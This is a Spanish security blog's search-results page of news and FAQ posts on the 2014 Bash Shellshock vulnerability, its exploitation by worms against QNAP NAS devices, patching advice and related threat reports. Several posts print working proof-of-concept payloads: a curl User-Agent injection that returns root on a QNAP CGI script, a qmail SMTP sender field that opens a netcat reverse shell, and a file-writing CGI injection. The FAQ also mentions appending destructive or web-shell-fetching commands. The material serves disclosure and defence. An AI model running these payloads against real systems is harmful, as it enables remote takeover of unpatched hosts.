SAFE. Guía para proteger tu vida digital y tu privacidad
Mostrando las entradas para la consulta Shellshock ordenadas por relevancia. Ordenar por fecha Mostrar todas las entradas
Mostrando las entradas para la consulta Shellshock ordenadas por relevancia. Ordenar por fecha Mostrar todas las entradas

20 dic 2014

Sistemas NAS de QNAP atacados por ShellShock (Parchea!)

Expertos de SANS Institute descubrieron un gusano que está explotando la vulnerabilidad Shellshock para comprometer sistemas Network Attached Storage (NAS) de la empresa coreana QNAP. Los sistemas NAS se utilizan en las empresas para almacenar grandes volúmenes de archivos y bases de datos y esto hace que un NAS sea un objetivo atractivo para los atacantes, dado los amplios tipos de datos que almacenan.

FireEye ha estado monitoreando los ataques relacionados con Shellshock y ha observado que los atacantes intentan aprovechar esta vulnerabilidad de inyección de código remoto Bash para obtener un shell remoto en el sistema comprometido y acceder al contenido de los NAS. Los objetivos se han ubicado principalmente en Japón, Corea y Estados Unidos.

Prácticamente todos los dispositivos NAS ejecutan un Linux embebido que es vulnerable a CVE-2014-6271 más conocida como ShellShock. Esta vulnerabilidad es particularmente grave porque concede privilegios de root al atacante. La Prueba de Concepto se discute públicamente aquí.
$ curl -A '() { :;}; echo Content-Type: text/html; echo; echo
`/usr/bin/id`' http://QNAP_QTS:8080/cgi-bin/restore_config.cgi
*uid=0(admin) gid=0(administrators)*
HTTP/1.1 200 OK
Basado en la cantidad de dispositivos que ejecute un sistema operativo Linux embebido y la ventana de tiempo para parchearlos, existe un potencial compromiso a gran escala de dispositivos almacenamiento y del tipo IoT. Hay pruebas de que los atacantes están aprovechando activamente la vulnerabilidad dirigida a dispositivos embebidos de QNAP con el fin de subir su clave SSH al archivo "authorized_keys" e instalar un ELF Backdoor.

En el post publicado por SANS explican que, a pesar de QNAP ya lanzó el parche en octubre, muchos dispositivos fueron infectados por el gusano y todavía hay un montón de usuarios que no han actualizado sus sistemas. El ataque apunta al script CGI de QNAP "cgi-bin/authLogin.cgi", un conocido vector de ataque para Shellshock.

El escenario de ataque es muy interesante: una vez modificado el sistema QNAP el gusano crea un nuevo usuario administrativo para obtener una backdoor persistente. El gusano también parchea Shellshock para evitar que otro malware pueda explotarlo. El dispositivos infectado también ejecutan un script que permite realizar fraudes de click contra la red de publicidad JuiceADV. Además los dispositivos infectados buscan otros dispositivos vulnerables. Parte del código ya se encuentra en Pastebin.

La lista detallada de las acciones realizadas por el gusano:
  • Establece el servidor DNS 8.8.8.8
  • Crea un servidor SSH en el puerto 26
  • Agrega un usuario admin llamado "request"
  • Descarga y copia una secuencia de comandos CGI a to cgi-bin: armgH.cgi y exo.cgi
  • Modifica el autorun.sh para ejecutar backdoors en el reinicio
  • Descargar e instala el parche de Shellshock para QNAP y reinicia el dispositivo.
El gusano instala también muchos otros componentes maliciosos. A los administradores que todavía no parcheado su sistema QNAP, deben hacerlo con urgencia. Según el comunicado de prensa de QNAP, los usuarios deberían desconectar los sistemas que son directamente accesibles desde Internet hasta que se aplique la actualización. Aquí explican cómo remover la infección.

Fuente: Security Affairs

7 oct 2014

Yahoo confirma servidores infectados, pero no por Shellshock

Yahoo ha confirmado que han descubierto un "puñado" de servidores infectados pero ha indicado que ningún cliente fue afectado por el malware y asegura que Shellshock no fue la causa.

El gigante está bajo escrutinio luego que Future South Technologies publicara un informe asegurando que la compañía había sido infiltrada con malware utilizando el bug Shellshock. Supuestamente delincuentes rumanos lograron ejecutar scripts diseñados para crear botnets y realizar ataques DDoS.

El informe también dice que Lycos y WinZip son vulnerables a Shellshock. Este último confirmó el problema y agradeció al investigador.

En un post a Hacker News, el CISO de Yahoo Alex Stamos refutó tales afirmaciones diciendo que "después de investigar plenamente la situación, resulta que los servidores no fueron afectados por Shellshock".

Desde Yahoo informaron que "Tres de nuestros servidores de Sports API tenían código malicioso que habían sido ejecutado por los atacantes buscando servidores Shellshock vulnerables pero los servidores fueron inmediatamente aislados. Como estos servidores son utilizados para proporcionar streaming y no mantienen o almacenan datos de usuarios, la compañía no ha encontrado ninguna evidencia de que los datos de los usuarios hayan sido afectados".

Fuente: ZDNet

25 sept 2014

FAQ de #Shellshock: Exploit, RCE, DDoS y malware para #Bash en Linux, Unix y Mac OS X

  1. Introducción
  2. ¿Cuál es el problema
  3. Muchas formas de atacar
  4. ¿Cuál es el impacto de la vulnerabilidad?
  5. ¿Debo aplicar el parche?
  6. ¿Cuáles son mis otras opciones? ¿Qué debo hacer?
  7. ¿Cómo puedo encontrar sistemas vulnerables?
    Herramientas
  8. Más información
  9. 27/09 - Botnets
  10. 28/09 - Uso de qmail como vector de ataque
  11. 29/09 -Colección de exploits (29/09)
  12. 30/09 -Recomendaciones
  13. 05/10 - Más PoCs y línea de tiempo

Introducción

Ayer se anunció una vulnerabilidad en GNU Bash (Bourne Again Shell) (CVE-2014-7169) originalmente encontrada por el francés Stephane Schazelas de Akamai y que afecta desde la versión 1.14 hasta la 4.3 de Bash. La vulnerabilidad permite la ejecución de código arbitrario en Bash al establecer variables de entorno específicos. Más tarde Travis Ormandy lanzó un segundo exploit que funcionaba en sistemas parcheados porque los parches lanzados ayer eran incompletos.
Tod Beardsley, administrador de ingeniería en la firma de ciberseguridad Rapid7, advirtió de que el error tenía una nota de gravedad "10", lo que significa que tiene un impacto máximo, y una calificación "baja" en complejidad de explotación, lo que significa que es relativamente fácil de utilizar por piratas informáticos para lanzar ataques.

"Al usar esta vulnerabilidad, los atacantes potencialmente pueden tomar el control del sistema operativo, acceder a información confidencial, hacer cambios, etc. Cualquiera con sistemas que ocupen Bash deben aplicar el parche inmediatamente", dijo Beardsley.

¿Cúal el problema?

Como menciona David Garcia en Hispasec, al crear crear una función en el intérprete, exportarla e invocarla:
$function test { echo "hola";}
$ export –f test
$ bash
$ test
  hola
El problema está en el mecanismo que hace de exportación de esa función, la forma en la que lo hace y como interpreta el código que se inyecta en el entorno donde es exportada.

Para conseguir esa exportación de funciones bash recurre a un pequeño "truco". No exporta la función en sí, sino en una variable de entorno donde se interpreta su valor como el cuerpo de una función. Vamos a verlo modificando el ejemplo anterior, en vez de una función vamos a crear una variable de entorno:
$ test='() {echo "hola";}'
Exportamos, no una función sino una variable que es lo que haría el intérprete:
$ export test
$ bash
$ test
  hola
Cuando el entorno recibe esta variable y el interprete detecta la siguiente cadena '() {' entiende que está ante una función y comienza a interpretar su código. El problema y aquí entramos en la zona peligrosa, es que no para de interpretar cuando termina el cuerpo de la función y continua ejecutando el código que viene detrás del cuerpo.

Por ejemplo, si el intérprete tiene la siguiente variable-función exportada con código más allá de la definición de la función:
'(){ echo "hola"; }; /bin/ls'
Terminará ejecutando el '/bin/ls' cuando se esté interpretando esa cadena. No hará falta invocar la función, justo cuando el interprete procese las cadenas detrás del cuerpo de la función ejecutará el comando. Idealmente, debería de terminar justo cuando encuentre el '};' correspondiente pero inexplicablemente no lo hace y peor aun ejecuta directamente ese código anexado al cuerpo de la función.

Otra cadena y scripts válidos sería:
env x='() { :;}; echo vulnerable' bash -c "echo Esto es una prueba"
El ejemplo que se propagó es la mínima expresión de definición de una función en bash "() { :;};"

El bloque de la función definida contiene el carácter ":" que en bash no hace nada, simplemente devolver cero (su correspondiente en C sería un "return 0;"). A esa cadena por supuesto se le puede adosar cualquier comando, desde un echo "yo estuve aquí" hasta un devastador "rm –Rf" o un "curl****/mi_shell.php" para depositarla en "/var/www/".

Muchas formas de atacar

En las pocas horas que lleva In-the-Wild, ya han aparecido exploit y PoC para lograr (RCE) Remote Code Execution (RCE), ataques web que permiten subir código y shell a sitios web, y troyanos que permiten realizar ataques de DDoS, BruteForce sobre usuarios y contraseñas de la red y robo de información a distintas direcciones IP que han ido cambiando durante el día e incluso ya se han visto gusanos explotando la vulnerabilidad. Basicamente estamos hablando de un troyano ELF que permite DDoS, Flooder, Scanner, Bot-Backdoor y Login bruter, R00ter.

En esta imagen se puede ver la lista de contraseñas que intenta el troyano:
Otro de los troyanos bautizados como ELF_BASHLITE, ELF Linux/Bash0day o Shellshock o Bashroot ha sido analizado por TrendMicro.


¿Cuál es el impacto de la vulnerabilidad?

Al principio, la vulnerabilidad no parece tan grave pero la realidad es que se puede ejecutarse código remoto simplemente establecimiento de una variable de entorno y sin que el usuario se percate de la situación.

El escenario más problemático parece ser cuando un Bash Scripts es ejecutado mediante cgi-bin. La especificación CGI requiere que el servidor web convierta la solicitud de los headers HTTP suministrados por el cliente y las transforme en variables de entorno.

Entonces, se puede aprovechar que Apache "transforma" las cabeceras en variables de entorno: por ejemplo el User-Agent se introducirá como valor de la variable de entorno HTTP_USER_AGENT de Apache. Si un script Bash se llama vía cgi-bin, un atacante puede utilizar estas variables para ejecutar código que el servidor web.

Otros escenarios probables involucran SSH al momento de establecer variables de entorno, pero tendrían que establecerse en el servidor en un archivo de configuración. Otra alternativa es mediante clientes DHCP que en algunos casos ejecutan scripts Bash y utilizan variables de entorno suministradas por el servidor.
Esta PoC de TrustSec muestra como se puede insertar código en la opción 114 (default-url) del servidor DHCP para explotar la vulnerabilidad. Este caso puede ser explotable si el usuario se conecta a un servidor DHCP no confiable ("cofeehouse wifi").

En las últimas horas ya se han producido ataques basados en la vulnerabilidad a routers de particulares y controladores utilizados en la gestión de instalaciones de infraestructuras críticas, haciendo barridos aleatorios en Internet en busca de equipos con la vulnerabilidad para tomar el control de los mismos y lanzar ataques de DoS.

¿Debo aplicar el parche?

Sí pero el parche va a arreglar sólo algunos de los aspectos de la vulnerabilidad y no soluciona totalmente la vulnerabilidad. Aún se desconocen los efectos secundarios del parche y de las distintas opciones de ataques que podrían existir.

La mayoría de distribuciones Linux ya han distribuido un primer parche, aunque está incompleto y no acaba de corregir del todo la vulnerabilidad.

Por su parte los usuarios de Apple estan expuestos ya que los de Cupertino no han dado ninguna respuesta aunque estos sistemas suelen estar menos expuestos a Internet, y en última instancia ya hay instrucciones para parchear su instalación.

Mientras se esperan las actualizaciones definitivas se puede utilizar este script para prevenir y mitigar el impacto.

¿Cuáles son mis otras opciones? ¿Qué debo hacer?

Puesto que el parche es incompleto, se debería intentar implementar medidas adicionales para proteger los sistemas. Algunos vendedores de sistema de detección de intrusiones (IDS) y Firewall de aplicaciones Web (WAF) han publicado las reglas para bloquear la explotación pero las reglas aún podrían estar incompletas porque sólo buscan la cadena "() {" que estaba presente en la prueba inicial.

Una alternativa sería cambiar la shell por defecto para una alternativa como ksh o sh pero esto podría generar errores en algunas secuencias de comandos determinadas.

En sistemas embebidos se podría utiliza la shell alternativa como Busybox que no es vulnerable.

¿Cómo puedo encontrar sistemas vulnerables?

Si puede iniciar sesión en el sistema y se puede utilizar algunas de las cadenas de test publicadas, como la siguiente:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
Si ya se ha aplicado el parche, se puede utilizar este comando:
env x='() { (a)=>\' bash -c "echo date";
Este comando devolverá un error en un sistema totalmente parcheado, pero creará un archivo vacío denominado "echo".

Existen varios módulos para escáneres de vulnerabilidad que buscan sistemas vulnerables. También se puede utilizar una búsqueda en Google para encontrar servidores web vulnerables. Por ejemplo: filetype:sh inurl:cgi-bin site:[su_dominio].

Además se debe controlar los servidores web en sistemas embebidos como routers para que no pueden ejecutar secuencias de comandos bash con privilegios elevados.

Con respecto a PHP, RedHat ha declarado que mod_php, mod_perl y mod_python no utilizan variables de entorno y en principio no se verían afectados. De todos modos, se han publicado varios consejos para mitigar el ataque.

Herramientas

Además, se puede utilizar esta herramienta y esta otra para revisar los servidores en línea y Tripwire ha publicado una herramienta para probar los sistemas propios.

Más información

Distintos medios se han hecho eco de la noticia publicando distinto tipo de información e ISC ha publicado un video al respecto y slides PDF con más información. Redhat por su parte mantiene la información permanentemente actualizada y Qualys ha publicado varias actualizaciones al respecto.

27/09 - Botnets

En las últimas horas ha aparecido la botnet wopbot y la misma se encuentra realizando exploración del Internet para encontrar sistemas vulnerables. Wopbot se está utilizando para lanzar ataques DDoS contra servidores de contenidos de Akamai realiza scaneos en el puerto TCP 23 (Telnet) para propósitos de ataque de fuerza bruta.

"Si bien se desconoce la cantidad de sistemas infectados en la botnet wopbot, se cree que el número podría aumentar muy rápidamente ya que podría infectar más de 200.000 zombies en una hora" dijo Emanuele Gentili, de la empresa Tiger Security.

28/09 - Uso de qmail como vector de ataque

"D. J. Bernstein (aka djb) reconoció que el popular servidor de correo qmail podía ser utilizado como un vector de ataque para explotar bash vulnerables

Las condiciones previas para que este ataque funcione son:
  • bash "shellshock" vulnerables
  • un enlace simbolico de /bin/sh a bash
  • entrega de un correo electrónico a través de qmail a un usuario válido
Al parece la explotación se puede realizar a través de qmail-1.03 (última versión de DJB) y netqmail-1.06, debido a la falta de validaciones en ciertos campos del protocolo SMTP.

Ejemplo:
terminal 0)

$ nc -l -p 7777

(terminal 1)

$ pwd
/home/kgeorge
$ cat .qmail
|/bin/cat
$ telnet localhost 25
Trying 127.0.0.1... 
Connected to localhost.
Escape character is '^]'. 
220 mail.example.com ESMTP 
ehlo me
250-mail.example.com
250-PIPELINING
250 8BITMIME
mail from:<() { :; }; nc -e /bin/bash localhost 7777>
250 ok
rcpt to:
250 ok
data
354 go ahead
Subject: Vuln

.
250 ok 1411674782 qp 4151

(terminal 0)

$ nc -l -p 7777
ls
mail
whoami
kgeorge
Como se puede ver se puede ejecutar comandos remotos a través de la utilización las variables de entorno que son utilizadas por qmail para pasar información a otros proceso.

La recomendación por ahora es actualizar bash y cambiar /bin/sh a algo como dash.

29/09 - Colección de exploits

Johannes Ullrich de SANS ha publicado una colección de exploits para Shellshock y que actualmente se encuentra siendo explotados activamente.

30/09 - Recomendaciones

  • Actualizar inmediatamente la versión vulnerable de Bash, según la distribución:
  • También existen actualizaciones para Bash 3.2 que se pueden descargar desde gnu.org y compilar.
  • Si no actualizará Bash, considere cambiar de Shell, al menos temporalmente.
  • Monitorear los logs para detectar cualquier tipo de firma o cadena dañina y bloquear estos intentos con las herramientas que se dispongan.
  • Analice cada uno de sus servidores/servicios web, de correo, DNS, etc. para verificar que no exista un vector de ataque a través de esos servicios, según hemos informado en este artículo.

05/10 - Más PoCs y línea de tiempo

En este enlace del repositorio Github de Rob Fuller (Mubix) se van recopilando todos los POCs de ShellShock que van apareciendo. Además, David A. Wheeler ha creado una página con el timeline de Shellshock.

Cristian de la Redacción de Segu-Info

15 dic 2014

Intel Security pronostica un aumento del ciberespionaje y ataques a dispositivos inteligentes en 2015

Un informe de Intel Security pronostica un aumento del ciberespionaje y ataques a dispositivos inteligentes en 2015. El mismo informe recoge que en el tercer trimestre de 2014 se detectaron más de cinco ciberamenazas por segundo


Intel Security, presenta su informe sobre predicción de ciberamenazas previstas para 2015 [PDF], así como un análisis de las ciberamenazas acontecidas en el tercer trimestre de 2014, realizado por los laboratorios McAfee Labs de Intel Security. El informe arroja así mismo que el tercer trimestre del 2014 el malware se incrementó en un 76% respecto al año anterior. Los laboratorios McAfee Labs de Intel Security prevén un panorama de amenazas para 2015 caracterizado por el aumento de ciberataques que pondrán en jaque la validez de los estándares de seguridad actuales, nuevos ataques en dispositivos móviles y contra el Internet de las Cosas, así como un aumento de sofisticadas estrategias de ciberespionaje, incluyendo técnicas capaces de burlar algunas de las más conocidas tecnologías sandboxing de detección de malware diseñado específicamente para atacar a una determinada organización.

En el tercer trimestre del año, los laboratorios McAfee Labs de Intel Security han detectado más de 307 nuevas amenazas por minuto (lo que equivale a más de cinco por segundo), el malware en general se ha incrementado un 76% respecto al año anterior, destacando un crecimiento del 16% en el malware que afecta a dispositivos móviles. Los investigadores también identificaron nuevos intentos de aprovechar los estándares de confianza en internet, incluyendo las vulnerabilidades de secure socket layer (SSL, proceso que administra la seguridad de las transacciones que se realizan a través de Internet) como Heartbleed (que permite leer la memoria de un servidor por ejemplo, y conseguir así las claves privadas) y BERserk (que puede interceptar los datos confidenciales que intercambias con un sitio web), y el continuo abuso de la firma digital para enmascarar malware como códigos legítimos.

Para el año 2015, los laboratorios McAfee Labs prevén que los cibercriminales amplíen y mejoren sus capacidades para evitar ser detectados, así como el uso de estrategias de ciberespionaje para rastrear y recoger datos valiosos en ataques dirigidos. Los investigadores pronostican así mismo que los ciberdelincuentes se emplearán más y mejor en identificar los fallos de seguridad en las aplicaciones, sistemas operativos y hasta en la misma red, a la vez que aumenta el interés de estos ciberdelincuentes por las limitaciones de las tecnologías de sandboxing o aislamiento y análisis de amenazas.

Según Javier Perea, Regional Director de Intel de Security, 2014 será recordado como el año en que la confianza existente en los estándares, y las formas de operar hasta ese momento se degrado de forma significativa. Los fallos de seguridad aparecidos ha menoscabado la confianza de la industria en los estándares de seguridad actuales, también la confianza del consumidor en la capacidad de los proveedores de productos y servicios para proteger sus datos y la de estos en su propia capacidad para detectar y atajar a tiempo ataques específicos dirigidos a comprometer a sus organizaciones

Restaurar la confianza en el año 2015 requerirá una mayor colaboración por parte de la industria, el refuerzo y la creación de nuevos estándares para hacer frente a este panorama de amenazas y con mejores estrategias de seguridad que reduzcan el tiempo de detección haciendo un mayor y mejor uso de todas las fuentes de ciberinteligencia. En última instancia, sería necesario llegar a un modelo donde la seguridad sea un elemento crítico desde el proceso mismo de diseño y desarrollo de cada dispositivo y de cada aplicación.”

Los laboratorios McAfee Labs de Intel Security pronostican un aumento en las siguientes ciberamenazas para 2015:

1. Incremento de las tácticas de guerra cibernética y ciberespionaje. Los ataques de ciberespionaje serán cada vez más frecuentes y los cibercriminales serán aún más sigilosos en el proceso de robo de información. Por su parte, quienes se incorporen al mundo del cibercrimen buscarán maneras de robar información sensible y asediar a sus adversarios.
Los cibercriminales con experiencia trabajarán para mejorar su capacidad de permanecer ocultos en las redes y sistemas de sus víctimas.
Los ciberdelincuentes se centrarán más en seguir y monitorizar a sus víctimas recopilando información de valor, ya sea de tipo individual, propiedad intelectual e incluso de inteligencia.
Los laboratorios McAfee Labs alertan de que cada vez más países y grupos terroristas y criminales hacen uso de las técnicas de guerra cibernética y ciberespionaje.

2. Mayor frecuencia y virulencia en los ataques al Internet de las Cosas. A menos que los controles de seguridad estén incorporados ya de origen en las arquitecturas de los dispositivos inteligentes, el valor creciente de los datos recogidos, procesados y compartidos por estos dispositivos darán pie a los primeros ataques al IoT durante 2015.

3. Se intensificarán los debates sobre la privacidad. La privacidad de los datos seguirá siendo un tema candente mientras gobiernos y empresas no acerquen posiciones y se pongan de acuerdo sobre cuándo, qué y cómo acceder a la información personal, así como definir qué se considera información personal.
En 2015 presenciaremos un continuo debate y falta de claridad en torno a lo que constituye la "información personal", y en qué medida los actores públicos y privados pueden acceder y compartir esa información.
Seremos testigos de una continua evolución en el alcance y contenido de la regulación sobre la privacidad de los datos, podremos ver incluso leyes que regulen el uso de conjuntos de datos previamente anónimos.
La Unión Europea, los países de América Latina, así como Australia, Japón, Corea del Sur, Canadá y muchos otros podrían promulgar leyes y reglamentos de protección de datos muchos más estrictos.

4. El ransomware evoluciona en la nube. El ransomware, un software malicioso que al infectar nuestro equipo lo bloquea y nos pide un rescate para recuperar el control, evolucionará en sus métodos de propagación, cifrado y los objetivos a los que apunta. Cada vez más dispositivos móviles sufrirán estos ataques.
Podrían surgir variantes de ransomware que lograrán eludir la seguridad de soluciones y aplicaciones de almacenamiento en la nube.
Una vez que el terminal se ha infectado, el ransomware intentará explotar las credenciales almacenadas cuando el usuario inicie su sesión para también infectar los datos almacenados en la nube con copia de seguridad.
Se espera que la técnica de ransomware dirigida contra copias de seguridad en la nube también se suceda en cada vez más entornos móviles.
EL uso de moneda virtual se generalizará como método de pago de un rescate para este tipo de amenazas.

5. Nuevas estrategias y escenarios de ataques a dispositivos móviles. Los ataques a dispositivos móviles continuarán aumentando con la expansión de estas nuevas tecnologías.
La creciente disponibilidad de kits de generación de malware y códigos fuente del malware para dispositivos móviles facilitará el trabajo de los cibercriminales.
Las tiendas de aplicaciones que no son de confianza continuarán siendo una fuente importante de malware móvil. El tráfico a estas tiendas desde "malvertising" (publicidad maliciosa), está creciendo rápidamente en las plataformas móviles.

6. Los ataques contra el punto de venta aumentan y evolucionan con los nuevos métodos de pagos digitales. Los ataques a puntos de venta seguirán siendo lucrativos, y la creciente adopción de nuevos sistemas de pago digital en los dispositivos móviles abrirán nuevas puertas los ciberdelincuentes.
A pesar de los esfuerzos actuales del sector de la distribución para implementar más tarjetas con chip y número pin y lectores de tarjetas, los laboratorios McAfee Labs prevén un incremento en las amenazas que puede sufrir el sector del retail.
La tecnología de pago digital Near Field Communications (NFC) -tecnología inalámbrica presente por ejemplo en los abonos de transporte y pagos por móvil- representa una brecha de seguridad, aunque mitigable con un correcto uso y concienciación por parte de los usuarios.

7. Shellshock abre la puerta a ataques en Unix y Linux. Los ataques de malware contra sistemas diferentes de Windows aumentarán como consecuencia de la vulnerabilidad Shellshock (o virus Bash, es un fallo de seguridad que afecta a servidores web y dispositivos conectados a Internet, en particular a equipos Linux, Android, MacOS y BSD).
McAfee Labs advierte de que las réplicas de Shellshock se harán sentir durante los próximos años debido a la cantidad de dispositivos de Unix o Linux potencialmente vulnerables, desde los rúters hasta las televisiones, controladores industriales, sistemas de vuelo e infraestructuras críticas pueden llegar a sufrir estos ataques
En 2015, todo esto impulsará un aumento significativo en el malware dirigido a entornos diferentes de Windows, ya que los atacantes aprovecharán la vulnerabilidad.

8. La creciente explotación de los fallos de software. La explotación de vulnerabilidades es probable que aumente como consecuencia de nuevos fallos descubiertos en el software.
La explotación de nuevas técnicas de programación como “stack pivoting” y “return and jump” y la profundización en el conocimiento de la arquitectura de 64 bits pondrá de manifiesto nuevas vulnerabilidades y el consiguiente nuevo malware que las aprovechará.

9. Nuevas técnicas de evasión del sandboxing. Escapar de los entornos o mecanismos de cuarentena o sandboxing, como se conoce en inglés, será una importante batalla contra la que tendrán que lidiar los departamentos de seguridad.
Se han identificado brechas en tecnología de sandboxing implementadas actualmente Los laboratorios McAfee Labs prevén un incremento del número de técnicas para aprovechar esas vulnerabilidades y burlar los entornos de cuarentena.

Fuente: Red Seguridad

6 oct 2014

PoC de #ShellShock para OpenVPN

Llevo varios días viendo circular por la Red un PoC en Pastebin para explotar ShellShock en OpenVPN y quería verificarlo. Supuestamente el exploit funciona si usamos la opción 'auth-user-pass-verify' que permite a OpenVPN utilizar un script en bash (o en otros lenguajes) para autenticar con usuario y contraseña, sin certificados. Esto normalmente se considera inseguro al menos que se utilice como un segundo factor de autenticación y/o contra una base de datos con las passwords hasheadas.

No obstante puede ser un vector de ataque muy interesante si por ejemplo envenenamos ARP y redireccionamos los intentos de una victima de establecer un túnel hacia un servidor OpenVPN malicioso. Más adelante veremos algún escenario práctico para demostrar la criticidad de la vulnerabilidad...
Para empezar en nuestro laboratorio vamos a utilizar un par de máquinas virtuales con Kali Linux 1.0.6. Para ello lo importante será configurar el servidor OpenVPN con la opción auth-user-pass-verify y el método via-env que guardará el "username" y "password" en variables de entorno.

Contenido completo en fuente original HackPlayers

19 jun 2017

Vulnerabilidad en Apache Struts 2 ampliamente utilizada

Los ataques lanzados contra la vulnerabilidad de Apache Struts 2 (CVE-2017-5638) revelada en marzo son un excelente ejemplo de lo rápido que los delincuentes puede aprovechar las vulnerabilidades 0-Day para realizar ataques distribuidos.
Apache Struts 2 es un framework de aplicaciones web de código abierto para desarrollar aplicaciones Java EE. El 6 de marzo, Apache publicó una advertencia de seguridad sobre una vulnerabilidad de ejecución remota de código (RCE) en Jakarta y en múltiples versiones de Apache Struts 2. En menos de 24 horas se creó un script Python para aprovechar esta vulnerabilidad, y un informe de Talos señaló "una explotación inmediata".

De acuerdo con los datos de IBM Managed Security Services (MSS), la actividad delictiva aumentó 48 veces por encima del número promedio de ataques, durante el período de tiempo evaluado.
El 10 de marzo, IBM X-Force comenzó a ver ataques explotando esta vulnerabilidad dirigida a clientes. Estos ataques alcanzaron su punto máximo el 23 de marzo, que coincidió con el día en que Apache lanzó la solución. Aunque el volumen de actividad del ataque disminuyó considerablemente en el plazo de una semana, se sigue viendo un volumen de actividad persistente dirigido a esta vulnerabilidad.

El análisis de IBM encontró que casi el 50 por ciento de los ataques provino de China. Esto no es sorprendente, ya que el código de la PoC apareció por primera vez en foros chinos, y Rapid7 también informó los primeros ataques desde China. El 22 por ciento de los ataques provino de Estados Unidos y más del 45 por ciento de los objetivos se localizaron en los Estados Unidos, seguido por Australia al 28 por ciento y los U.K. al 17 por ciento.

Las principales industrias atacadas fueron la educación (32%), el alojamiento y los servicios de alimentación (23%), los servicios financieros (23%), la industria manufacturera (12%) y la atención sanitaria (10%).

¿Tan persistente como Shellshock?

Como se reveló en el índice de Inteligencia de Amenazas de X-Force de 2017, los ataques de Shellshock, que surgieron por primera vez en septiembre de 2014, perduraron a lo largo de 2016. La vulnerabilidad es relativamente fácil de explotar y los sistemas sin parches son abundantes.

Al igual que el GNU Bash Shell, Apache Struts 2 es ampliamente utilizado y la naturaleza de la vulnerabilidad (RCE) permite a los atacantes utilizar las máquinas comprometidas en una amplia gama de actividades, tales como la creación botnet, ataques DDoS y campañas de ransomware.

Conclusión: actualice a Apache Struts a la versión 2.3.32 o 2.5.10.1.

Fuente: Security Intelligence

24 sept 2014

Shellshock: PoC de la grave vulnerabilidad en bash y otros interpretes de comandos

Se acaba de publicar una vulnerabilidad crítica en Bash, el interprete de comandos de Linux y muchos otros sistemas Unix (incluido OSX), que también parece afectar a otros interpretes como zsh, tcsh, csh y ksh. Se ha identificado con el registro: CVE-2014-6271 y seguro que dará mucho que hablar los próximos días.

Mediante esta vulnerabilidad es posible ejecutar comandos debido al incorrecto procesado de las variables de entorno, en determinadas circunstancias, esto puede ser explotable remotamente.

El problema reside en que bash permite la declaración de funciones (como cualquier otro lenguaje interpretado) y no son validadas correctamente cuando son almacenadas en una variable. Con ejemplos seguro que se ve mejor.

Una función se declara de la siguiente forma:
$ cat test.sh
#!/bin/bash
function hola() {
    echo "Hola mundo"
}
hola

$ bash test.sh
Hola mundo

Pero por desgracia bash procesa todo el contenido de la variable y continua ejecutando incluso cuando termina la función:
$ VAR="() { echo 'Hola mundo'; }; echo 'Adios mundo'" bash -c "echo Prueba"
Adios mundo
Prueba
En la prueba anterior, se esperaba que únicamente se mostrase "Prueba", pero acaba procesando el echo de "Adios mundo".

Esto tiene implicaciones en servicios remotos, en especial en páginas web con CGIs que leerán las variables enviadas por el cliente como cabeceras (y que pueden contener comandos) y ejecutarán su contenido cuando se invoque bash. Explotar CGIs escritos en bash será trivial y aunque parezca mentira, existen miles:
Otras implicaciones conocidas hasta ahora, pero que seguro que aumentan estos días, son:
  • Uso en ForceCommand de SSH para limitar capacidades de ejecución de comandos
  • Otros CGI (como php, perl, etc) que lancen subshells con llamadas del tipo system()
  • Clientes DHCP que lancen shells.
  • Herramientas y aplicaciones con SUID que invoquen bash para alguna acción.
  • Sistemas móviles que utilicen bash, como Android
  • Otros sistemas con Linux, como routers (que generalmente lanzan pings, traceroutes, etc), modems, televisores, etc..
La alegría de la huerta. Nos esperan días con muchas noticias sobre nuevos impactos, Eso seguro.

Para solucionar el problema tan solo hay que esperar a que saquen el parche (y funcione), cosa que ya ha ocurrido en las distribuciones más populares, pero que tardará tiempo en sistemas embebidos o poco mantenidos.

Algunos como GNU Bash, Redhat/Fedora, CentOS, Debian, Ubuntu y Novel/SuSE ya han publicado las actualizaciones.

Ejemplo de un código vulnerable y su explotación sacado de un comentario de reddit:
[root@host cgi-bin]# rm -fr /tmp/aa
[root@host cgi-bin]# cat /var/www/cgi-bin/hi
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "hai"
[root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa'  https://localhost/cgi-bin/hi
hai
[root@host cgi-bin]#  tail -n1 /var/log/httpd/ssl_access_log
::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa"
[root@host cgi-bin]#  ls -l /tmp/aa
-rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa
[root@host cgi-bin]# sestatus
SELinux status:                 enabled
[root@host cgi-bin]# yum update

Prueba de Concepto

En la siguiente imagen se puede apreciar el ataque funcionando en un sitio de prueba:
  1. Inicialmente se ejecuta normalmente el SH en un navegador y se aprecia el resultado.
  2. A través de línea de comando se ejecuta una petición al script SH y se modifica el User-Agent
  3. Aquí se envía la cadena de comandos bash a ejecutar en en el servidor -en este caso la creación de un archivo de prueba-
  4. Se verifica que el SH se ejecuta y el archivo se crea en /tmp/test/
  5. Se observa el ataque en el Log de Apache.
Referencias:
Fuente: Security by Default

    9 sept 2015

    Tutorial de uso Burp Proxy

    SniferL4bs ha creado una guía de Burp Suite, una herramienta para realizar el análisis de seguridad de aplicaciones Web.

    BurpSuite cuenta con la integración de componentes que permiten realizar una auditoria a nuestras paginas mal configuradas y desarrolladas y ayuda a verificar la robustez de los mecanismos de autenticación y pone a disposición ataques combinados y automáticos. Burp se encuentra desarrollado y soportado por la empresa PortSwigger LTD y tiene dos presentaciones: Burp Free y Burp Professional ($299 anual).
    Esta mini-navaja web cuenta con varias herramientas las cuales se encuentran disponibles como pestañas y que conoceremos a continuación. De la misma manera se puede consultar el tutorial de ZAProxy.

      16 oct 2014

      Poodle: vulnerabilidad en SSL 3.0 y cómo te podría afectar

      Por Josep Albors

      Sin duda 2014 está siendo un año muy movido en lo que respecta a vulnerabilidades. Muchas de ellas en los propios cimientos de los sistemas y los protocolos de comunicaciones de la Internet actual.
      Si hace unos meses hablábamos de Heartbleed y no hace mucho de Shellshock, hoy toca hablar de Poodle. Esta grave vulnerabilidad afecta al protocolo de comunicación SSL 3.0 que ha sido publicada por investigadores de Google.

